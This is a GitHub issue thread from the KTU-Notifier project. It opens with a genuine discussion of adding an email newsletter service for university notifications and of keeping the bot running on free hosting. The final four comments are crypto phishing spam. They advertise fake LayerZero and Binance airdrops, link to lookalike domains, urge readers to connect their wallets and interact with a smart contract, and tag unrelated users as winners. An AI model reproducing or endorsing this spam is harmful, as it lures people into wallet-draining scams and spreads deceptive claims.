### ISSUE TITLE
Provide an email service similar to a newsletter.

### ISSUE THREAD

**Issue by AshminJayson** [AJAYK-01/KTU-Notifier#21]
Add email service that would allow forwarding of notifications to subscribed emails alongside a client application that'd allow users to subscribe to the notifications.

_🍻 Do assign the issue to me if it's something you guys are planning at._

**Comment by AJAYK-01** [comment]
Hey @AshminJayson, we have built another project [Cherava](https://github.com/roshan-r/cherava) that can create an Email based notification system for any website including the KTU notifications page without using any code.

Do check it out before trying to do this, and I can assign you if you still feel like the need for it. 
But yes, email and Whatsapp bot services are welcome, and I advise to use the Flask server in the project to extend that functionality.

Also the bot is currently running in Replit, with Uptime robot and other process restarting hacks to still be able to run without sleep, so I advise you take into consideration the deployability into such free platforms without compromising on uptime or performance. Checkout the related PR #20 

[EDIT]: that was an accidental close of the issue

**Comment by AshminJayson** [comment]
Heyy @AJAYK-01 , I was thinking more along the lines of sending the actual notification as an email with the attached pdf to any subscribed user. I believe [Cherava](https://github.com/roshan-r/cherava) notifies the user when there is a change on the CSS selector specified on the website right? I don't think that it'll fully address the issue.

Also, I think maybe that'd involve changing things around a bit, let me see if I can come up with a proper flow of how things intend to work, and I'll update the issue accordingly.

As for the cron job side of things I was thinking of running a GitHub action that triggers a hit on the server, and render might help close out the issue in #20 .


[EDIT]: I think it'd be better if I work on it for now separately and see if an integration is possible at any stage.

**Comment by AJAYK-01** [comment]
Hey @AshminJayson I have assigned you the issue.

I didn't really understand the Github Action part though. Do you mean like a CI/CD? I was talking about the resource usage mostly so that it still works on the free tiers.  All you have to do to know that is run a copy of the project in your own Repl.

Do update here when you get the flow of things ready, I would be happy to assist you if anything is required 😄

**Comment by AshminJayson** [comment]
Sure, I'm currently building a different version of the whole thing from my side. The GitHub actions would serve as a cron job pinging the server every now and then for fetching the notifications.

Thanks for the help 🤗, I might have to do it separately and see if we can mix and match things. The flow of notification and data which I made seems to be quite incompatible with the current flow.

**Comment by AJAYK-01** [comment]
Oh cool, didn't know GitHub actions could be used as a cron. Good luck!

**Comment by vokaplok** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by hansa-panot** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @mehrdad-shokri, @Mouradif, @DessertHeart, @mmxw, @694469927, @Rhelython, @t13ka

**Comment by hansa-panot** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @nilsbunger, @fijimunkii, @tracksuit, @ayuLiao, @ShihTingJustin, @ttt43ttt, @PRO12230805

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @danielbahrami, @Minecodes, @MikeJKBird, @prizrak2033, @BlockchainsFans, @pulasthi-Narada, @junaidAwsm
